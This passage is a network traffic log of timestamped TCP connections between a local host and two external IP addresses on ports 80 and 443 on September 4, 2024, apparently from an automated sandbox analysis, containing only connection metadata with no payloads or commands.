Sep 4, 2024 17:37:08.669768095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669770956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669794083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669806957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669969082 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.669987917 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.670027971 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.670036077 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.670047998 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.670064926 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.688659906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.688699007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.688710928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.688731909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.688745975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.688762903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.688774109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.688796043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.688815117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.688831091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.688842058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.688869953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.688880920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690016031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690063000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690079927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690090895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690124989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690172911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690182924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690191984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690201998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690206051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690232038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690249920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690722942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690768003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690778017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690779924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690794945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690814972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690857887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690871954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690881014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690890074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.690896034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690907001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.690920115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.691040039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.691051960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.691061974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.691082001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.691097975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.691104889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.691114902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.691123962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.691133022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.691142082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.691160917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.691176891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.696099043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696110010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696121931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696139097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696146011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.696151018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696160078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.696187973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.696273088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696291924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696301937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696315050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.696332932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.696865082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696904898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.696939945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696949005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696958065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696968079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696979046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.696984053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.696989059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.696991920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.697002888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.697015047 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.697036028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698076963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698120117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698146105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698157072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698188066 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698198080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698199034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698210001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698235989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698244095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698245049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698276043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698280096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698287964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698309898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698318958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698393106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698402882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698411942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698421955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698434114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698451996 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698508978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698518991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698540926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698555946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698637009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698647976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698657036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698664904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698674917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698679924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698685884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698690891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698697090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698707104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.698714018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698728085 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.698750973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700158119 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700179100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700189114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700203896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700217962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700223923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700294018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700304985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700314045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700334072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700347900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700366020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700377941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700390100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700423002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700453043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700464010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700472116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700501919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700501919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700575113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700584888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700592995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700619936 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700628996 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700633049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700661898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700701952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700716019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700742960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700742960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700757980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700817108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700845957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700858116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700866938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700876951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700886011 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700889111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700907946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700913906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.700963974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.700974941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.701001883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.701014996 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.701036930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.701049089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.701056957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.701065063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.701071978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.701078892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.701092005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.702553988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.702598095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.702634096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.702676058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.702761889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.702799082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.702848911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.702889919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.702980042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.703022003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.703073025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.703113079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.703213930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.703258991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.703262091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.703273058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.703296900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.703313112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.703382015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.703425884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.705303907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.705316067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.705326080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.705349922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.705363035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.705400944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.705410957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.705419064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.705427885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.705437899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.705450058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.705475092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.743275881 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.743304968 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.743391037 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.743400097 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.743432045 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.743438959 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.744544983 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.744559050 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.744627953 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.744635105 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.744674921 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.746308088 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.746324062 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.746371031 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.746378899 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.746417046 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.748425961 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.748440981 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.748497009 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.748503923 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.748543978 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.748838902 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.748853922 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.748882055 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.748888969 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.748910904 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.748924971 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.749361992 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.749377966 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.749417067 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.749423981 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.749442101 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.749460936 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.749504089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749516010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749550104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749577999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749581099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749592066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749619961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749629974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749630928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749640942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749659061 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749672890 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749681950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749711990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749723911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749732971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749743938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749752045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749756098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749763966 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749778032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749815941 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749815941 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749825954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749845982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749856949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749866962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749876976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749892950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749912977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.749984026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.749995947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750005960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750015974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750020027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750025988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750039101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750046015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750070095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750411034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750421047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750432014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750442028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750452042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750461102 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750461102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750469923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750474930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750493050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750515938 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750543118 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.750560045 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.750592947 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.750600100 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.750611067 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.750641108 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.750716925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750729084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750737906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750747919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750754118 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750776052 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750788927 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750838995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750849962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750864983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750873089 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750874043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750881910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750885963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750899076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750905037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750925064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750946045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750957012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.750983953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.750983953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751004934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751029968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751043081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751050949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751064062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751069069 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751074076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751077890 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751085997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751096010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751097918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.751106977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751117945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.751127005 CEST	49717	80	192.168.2.6	147.45.44.104
